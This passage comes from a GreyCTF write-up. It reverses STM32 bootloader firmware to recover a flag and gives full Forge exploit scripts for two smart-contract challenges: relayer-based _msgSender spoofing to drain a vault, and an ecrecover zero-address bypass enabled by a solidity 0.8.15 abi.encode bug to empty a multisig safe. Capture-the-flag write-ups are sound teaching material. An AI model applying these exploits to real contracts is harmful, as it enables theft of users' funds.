It’s the WebDFU Utility, which also tells us what bootloader this board is running. What’s useful is the handy Firmware Upload button, which lets us dump the firmware of the board.

Reverse engineering STM32 firmware is non-trivial, but this super helpful blogpost details how we can recreate the memory regions that the firmware is loaded into, which lets us resolve a bunch of references and make the ARM decompilation super clean.

I won’t go over how the mappings can be done in Ghidra since the blogpost details it in far better clarity than I could ever hope to achieve. Either way, we trace back through the string reference to this challenge and find the function which validates the flag.

 1void bootloader_chall(void)
 2
 3{
 4  char cVar1;
 5  int iVar2;
 6  byte local_30 [36];
 7  
 8  FUN_0800420a(0x80,PTR_s_Enter_flag_to_reboot_into_bootlo_08003df8);
 9  FUN_080064ae(local_30,0,0x1f);
10  cVar1 = cmplen(local_30,30);
11  FUN_0800420a(0x80,PTR_BYTE_08003e08,local_30);
12  if (cVar1 == 30) {
13    iVar2 = 0;
14    do {
15      if (PTR_BYTE_08003e08[iVar2] != (local_30[iVar2] ^ PTR_DAT_08003e04[iVar2]))
16      goto LAB_08003dac;
17      iVar2 = iVar2 + 1;
18    } while (iVar2 != 0x1e);
19    FUN_08004074(3,0);
20    FUN_08002700(DAT_08003e0c,1,0x4f42);
21    FUN_0800420a(0x80,DAT_08003e10);
22    cmplen(local_30,0x1e);
23  }
24  else {
25LAB_08003dac:
26    FUN_0800420a(0x80,PTR_s_WRONG!!!_08003e00);
27  }
28  return;
29}

So it XORs our 30 character long input against whatever is found at PTR_DAT_08003e04 and compares it to PTR_BYTE_08003e08. Inspecting those two reveal that they’re pointers to values in… SRAM.

And since we’re doing static reversing, well…


Fig: SRAM being completely blank

Yeah. I felt like reversing the binary to try and figure out when exactly these areas of memory get filled, but I just couldn’t. After the CTF, the challenge creator revealed that since the two regions of memory which are pointed to are just an offset from one another, I could’ve swept the binary with that offset to get the flag. However, during the CTF itself, I sought out an alternative solution…


Fig: The fucking nuclear option

Just emulate the firmware???


Fig: Dumping the emulated SRAM

We XOR these two bytestrings to get our flag, easy.

Flag: grey{what_flag_just_boot1_bro}

Blockchain

As previously stated, I wasn’t able to solve these challenges during the CTF itself due to a massive skill issue (an inability to implement the actual ideas). After the CTF, I managed to gitgud and upsolved these challenges and have thus included my solutions for posterity (and for my future reference too).

Metastaking

This is a challenge where we have a Staking contract tied to a Vault, where you can pass execution through the Staking contract via a Relayer, and your goal is to drain the vault.

As a RelayReceiver, the Staking contract makes use of this _msgSender function:

1    function _msgSender() internal view returns (address) {
2        if (msg.sender == relayer && msg.data.length >= 20) {
3            return address(bytes20(msg.data[msg.data.length - 20:]));
4        } else {
5            return msg.sender;
6        }
7    }

Take for example in the approve function found in the Staking.sol contract:

1    function approve(address spender, uint256 amount) external returns (bool) {
2        allowance[_msgSender()][spender] = amount;
3        
4        emit Approval(_msgSender(), spender, amount);
5
6        return true;
7    }

So basically, if you run your transaction instructions through the Relayer, you can “spoof” the msg.sender. And this is actually huge: looking at the approve function, we can basically perform an arbitrary approval on any pair of addresses with this!

Thus, we shall make a relayed transaction which approves the spending/transfer of funds from the Setup contract (which is the one which deposits the tokens to steal in this challenge) to our own address, and then we just drain them afterwards.

To ensure that the msg.sender == relayer is as expected, we also have to wrap our transaction data with the provided batchExecute function:

 1// SPDX-License-Identifier: UNLICENSED
 2pragma solidity 0.8.15;
 3
 4abstract contract Batch {
 5    function batchExecute(bytes[] calldata data) external returns (bytes[] memory results) {
 6        results = new bytes[](data.length);
 7        for (uint256 i = 0; i < data.length; i++) {
 8            bool success;
 9            (success, results[i]) = address(this).delegatecall(data[i]);
10            require(success, "Multicall failed");
11        }
12        return results;
13    }
14}

We fill out the logic for generating the transaction signature using Forge cheatcodes in our exploit script, which looks like this:

 1// SPDX-License-Identifier: UNLICENSED
 2pragma solidity 0.8.15;
 3
 4import "forge-std/Script.sol";
 5import { Relayer } from "../src/Relayer.sol";
 6import { Staking } from "../src/Staking.sol";
 7import { Vault } from "../src/Vault.sol";
 8import { GREY } from "../lib/GREY.sol";
 9import { Batch } from "../lib/Batch.sol";
10
11contract Exploit is Script {
12
13    Relayer public relayer;
14    Staking public staking;
15    GREY public grey;
16
17    function run() external{
18
19        relayer = Relayer(0x7F65d50b2915D5B2Ca6cbb879cd5fe940FD44b86);
20        staking = Staking(0xbFbb2c333b6296687406ecDA918A4cd0740fAa12);
21        grey = GREY(0xA44B9f3F5Bb8C278c1ee85D8F32517c6EFa64B0D);
22        
23        uint256 private_key = vm.envUint("PKEY");
24        address deployer = vm.addr(private_key);
25
26        vm.startBroadcast(private_key);
27
28        // now we construct the TX to be relayed
29        address spender = deployer;
30        uint256 amount = 10_000e18;
31
32        bytes memory data = abi.encodeCall(
33            Staking.approve,
34            (spender, amount)
35        );
36
37        bytes[] memory innerData = new bytes[](1);
38        innerData[0] = abi.encodePacked(data, address(0x700b6A60ce7EaaEA56F065753d8dcB9653dbAD35)); // append the address to serve as _msgSender
39
40
41        Relayer.Transaction memory transaction = Relayer.Transaction({
42            from: deployer,
43            to: address(staking),
44            value: 0,
45            gas: 100000,
46            data: abi.encodeCall(Batch.batchExecute, (innerData))
47        });
48
49        bytes32 transactionHash = keccak256(abi.encode(transaction, relayer.nonce()));
50        (uint8 v, bytes32 r, bytes32 s) = vm.sign(private_key, transactionHash);
51
52        assert(deployer == ecrecover(transactionHash, v, r, s));
53
54        Relayer.Signature memory signature = Relayer.Signature({
55            v: v,
56            r: r,
57            s: s,
58            deadline: block.timestamp + 3600 // 1 hour from now
59        });
60
61        Relayer.TransactionRequest memory request = Relayer.TransactionRequest({
62            transaction: transaction,
63            signature: signature
64        });
65
66        // Execute the transaction via the Relayer
67        relayer.execute(request);
68
69        vm.stopBroadcast();
70    }
71
72}

We manually make the fund transfers using cast send afterwards and win :D

Gnosis Unsafe

This challenge involves the sort of spoofing of ecrecover’s output. We basically want to fake being an Owner of the Safe contract in order to queue and execute a transaction.

Here’s where things get tricky.

Let’s look at the queueTransaction function:

 1    function isOwner(address owner) public view returns (bool) {
 2        for (uint256 i = 0; i < OWNER_COUNT; i++) {
 3            if (owner == owners[i]) {
 4                return true;
 5            }
 6        }
 7        return false;
 8    }
 9    
10    function queueTransaction(
11        uint8[OWNER_COUNT] calldata v,
12        bytes32[OWNER_COUNT] calldata r,
13        bytes32[OWNER_COUNT] calldata s,
14        Transaction calldata transaction
15    ) external returns (bytes32 queueHash) {
16        if (!isOwner(transaction.signer)) revert SignerIsNotOwner();
17
18        queueHash = keccak256(abi.encode(
19            transaction,
20            v,
21            r,
22            s
23        ));
24
25        queueHashToTimestamp[queueHash] = block.timestamp;
26    }

So for your transaction to be queued, you can set the transaction.signer to one of the values set in the Owner array (which is initialized to [address(0x1337), address(0xdead), address(0xdeadbeef)]). Solid, sure.

Now, for this transaction to actually be called, we have to call executeTransaction:

 1    function executeTransaction(
 2        uint8[OWNER_COUNT] calldata v,
 3        bytes32[OWNER_COUNT] calldata r,
 4        bytes32[OWNER_COUNT] calldata s,
 5        Transaction calldata transaction,
 6        uint256 signatureIndex
 7    ) external payable returns (bool success, bytes memory returndata) {
 8        if (signatureIndex >= OWNER_COUNT) revert InvalidIndex();
 9        
10        bytes32 queueHash = keccak256(abi.encode(
11            transaction,
12            v,
13            r,
14            s
15        ));
16
17        uint256 queueTimestamp = queueHashToTimestamp[queueHash];
18        if (queueTimestamp == 0) revert TransactionNotQueued();
19        if (block.timestamp < queueTimestamp + VETO_DURATION) revert StillInVetoPeriod();
20
21        bytes32 txHash = keccak256(abi.encode(transaction));
22        if (transactionExecuted[txHash]) revert TransactionAlreadyExecuted();
23
24        address signer = ecrecover(
25            txHash, 
26            v[signatureIndex], 
27            r[signatureIndex], 
28            s[signatureIndex]
29        );
30        if (signer != transaction.signer) revert InvalidSignature();
31
32        transactionExecuted[txHash] = true;
33        (success, returndata) = transaction.to.call{ value: transaction.value }(transaction.data);
34    }

Now we’re in trouble! We previously spoofed the transaction.signer, and we require it to be the same to retrieve the transaction from the queue as it’s part of the data used to calculate the queue hash. However, at the end, we require the output of ecrecover to match our transaction.signer, and of course we don’t have the private keys to these vanity addresses!

But what if I told you you didn’t need the transaction.signer to be the same?

The challenge is compiled with solidity version 0.8.15, and through some hardcore googling, we find this relevant bug which was previously used in a similar CTF challenge. Essentially, in our queueTransaction function, after the call to isOwner, we have a buggy call to abi.encode which actually zeroes out our transaction.signer.

This means we can subsequently make a call to executeTransaction with a transaction.signer set to address(0), and if we then pass in a bunch of invalid values for ecrecover, it will pass the signer == transaction.signer check!

So now we just create a Forge script which does just that, with our transaction data being a transfer of tokens from the safe to us.

 1// SPDX-License-Identifier: UNLICENSED
 2pragma solidity 0.8.15;
 3
 4import "forge-std/Script.sol";
 5
 6import { ISafe } from "../interfaces/ISafe.sol";
 7import { Safe } from "../src/Safe.sol";
 8import { GREY } from "../lib/GREY.sol";
 9
10contract Exploit is Script {
11
12    Safe public safe;
13    GREY public grey;
14
15    function run() external {
16        uint256 private_key = vm.envUint("PKEY");
17        address deployer = vm.addr(private_key);
18
19        safe = Safe(payable(0xb406262CE03F4dD507Ca8B67649E7eE1a52Aa047));
20        grey = GREY(0xc19Bc969cfc40DfF49605AedefC69a74c5Aef69E);
21
22        vm.startBroadcast(private_key);
23
24        uint256 amount = 10_000e18;
25
26        bytes memory data = abi.encodeCall(
27            GREY.transferFrom,
28            (address(safe), deployer, amount)
29        );
30
31        ISafe.Transaction memory transaction = ISafe.Transaction({
32            signer: address(0x1337),
33            to: address(grey),
34            value: 0,            
35            data: data
36        });
37
38        uint8[3] memory v = [0,0,0];
39        bytes32[3] memory r = [bytes32(0),bytes32(0),bytes32(0)];
40        bytes32[3] memory s = [bytes32(0),bytes32(0),bytes32(0)];
41
42        safe.queueTransaction(v, r, s, transaction);
43
44        assert(ecrecover(keccak256(abi.encode(
45            transaction,
46            v,
47            r,
48            s
49        )), v[0], r[0], s[0]) == address(0));
50
51        ISafe.Transaction memory transaction2 = ISafe.Transaction({
52            signer: address(0),
53            to: address(grey),
54            value: 0,            
55            data: data
56        });
57
58        vm.sleep(65_000); // wait for veto period to end
59
60        safe.executeTransaction(v, r, s, transaction2, 0);
61
62        vm.stopBroadcast();
63    }
64
65}

And we win :")

Ending Remarks

This year’s iteration of GreyCTF was truly hella fun and I’ve walked away from it learning lots more. Huge props to the organising team and I’m definitely going to take part again next year.

Check out NUS Greyhats’ stuff over on Twitter and Instagram